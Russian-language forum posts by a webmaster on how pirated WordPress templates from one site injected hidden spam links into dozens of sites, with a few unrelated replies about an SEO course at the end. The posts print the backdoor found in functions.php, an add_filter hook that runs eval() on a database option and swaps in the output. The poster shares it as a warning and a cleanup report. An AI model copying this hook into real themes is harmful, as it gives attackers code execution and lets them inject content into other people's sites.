goliafz

Код везде разный. Но с add_filter есть у всех.

Возможно это послужило причиной вылета 11 сайтов под АГС. Я все никак не мог понять по какой причине сайты уходят под АГС. Теперь уже понятно. Спрятанная ссылка для яндекса - это как спам.

Чуть позже выложу отчет о масштабах такого развода для 75 сайтов (часть из них не с шаблонами от wordpresse.ru).

Самому интересно насколько сильно проспамили мои сайты. :)

Шаблоны были с wordpresse.ru (ни один шаблон не качать!)

Я вначале грешил на плагин isape. Там были зашифрованы участки кода. Причем после отключения плагина пропадали скрытые ссылки. Но на самом деле они пропадали из точки в сапе ссылках и вставлялись в текст.

Я все перерыл. Чистил шаблоны. Сразу же нашел, что в шаблонах были 2 файла:

clinks.php

slinks.php

Если увидите такие файлы. Сразу же переименовываем и чистим от них шаблон.

После такой чистки я думал, что больше нет в шаблонах лишних ссылок (футер обязательно надо чистить, обычно ссылки в открытую там выкладывают).

Спалил ссылки по сапе. Вылезли эрроры. Оказалось, что встраиваясь в плагин isape, а точнее заменяя точку в сапоссылках на свою получалось так, что сапоссылка становилась просто текстом, а вместо конечной точки уже скрытая ссылка.

Шерстил все, что мог. Шаблон просматривал несколько раз. Все чисто. Никак не связывается с другим сайтом.

Сразу же подумал, что эта проблема в самом дистрибутиве вордпресса. Скачал последнюю версию с официального сайта (до этого дистрибутив качал с какого-то сайта с локализацией). Удалил папки wp-admin и wp-includes. Результат нулевой.

Дальше я логически подумал и пришел к выводу, что ломанули сервер. Но потом я понял, что это глупость. Т.к. мои сайты расположены на 6 разных серверах. Взломать все 6 серверов и залить зловред - это бред.

Потом я решил, что возможно сам дистрибутив был с самого начала левым. Но не сами файлы, а mysql, который ставится. Начал шерстить базу. Но там все чисто.

Искал в инете решение проблемы, но все безрезультатно. Просто я искал не то, что мне нужно было. Вызвал подозрение плагин askimet. Я заметил, что он связывается с сервером. Далее я решил перейти по ссылке с доменом. Но как оказалось, там все запрещено для просмотра. Тут то я и решил, что это связано скорее всего с ним. Но я этот плагин никогда не включал.

Удалил плагин. Проблема не исчезла. Я снова давай шерстить шаблоны. И подумал логически, что скорее всего какой-то левый код будет расположен в function.php. И оказался прав. Только этот код сложно заметить. Да и непонятно, что он делает. Но по 1 слову в нем я сразу же догадался, что его тут не должно быть.

add_filter('the_content', '_bloginfo', 10001);

function _bloginfo($content){

	global $post;

    if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){

        return $co;

    } else return $content;

}

Убрал этот код и ссылок сразу же не стало. Причина была именно в этом куске кода!

Единственное для меня остается загадкой каким образом этот участок кода берет откуда то ссылки с других сайтов?

Да, я очень долго боролся с этой фигней. Больше 2-3 месяцев. Не подумал бы, что этот участок кода может вставлять ссылки. Ведь нет никаких шифров, нет никаких ссылок, ведущих на другие сайты. Нет ничего такого о чем можно подумать, что что-то тут не так.

Вывод: шаблоны с того сайта не качать. Там идет тройная атака ссылками: через футер, через дополнительные файлы и через вышеуказанный код.

Ура. Нашел причину. Была в шаблоне, но очень сильно запрятана.

Ни то, ни другое. Уже проверил.

goliafz добавил 07.09.2011 в 01:57

ВПС и шаред. На разных хостингах такая фигня.

На компе нет никакой заразы. Стоит КИС 2012. Базы обновляются ежедневно. ОС семерка, также постоянно обновляю.

goliafz добавил 06.09.2011 в 16:11

Практически на всех сайтах на вордпрессе такая штука есть.

Помню давно когда заливал сайты (месяца 2 назад). То эти ссылки прямо сразу же появлялись. Удалить их было невозможно.

Если не ошибаюсь, то такая же проблема была и на других сайтах на том же движке, но уже на другом хостере.

На каждом из сайтов их штук 5-10. Не больше. Ладно бы это было на 1 сайте, а то на нескольких.

Проверял. Прикол вот в чем. У меня много разных шаблонов. Их я все чистил ручками. На разных шаблонах появляется такие ссылки. Но вот если я ставлю стандартный шаблон, то ничего нет.

Я понимаю, что тут сразу же надо думать на шаблон. Но в нем нет ничего подозрительного.

Отлично. Жду в четверг/пятницу сообщение с реквизитами на оплату :)

Вы уже занимаетесь по этому курсу? :)

Kamchess, упор курса будет на сайты с траффиком?

Просто у меня уже имеется опыт работы с ГС, сателлитами и СДЛ в биржах ссылок, а вот с траффиком плохо умею работать. Будет ли мне полезен данный курс?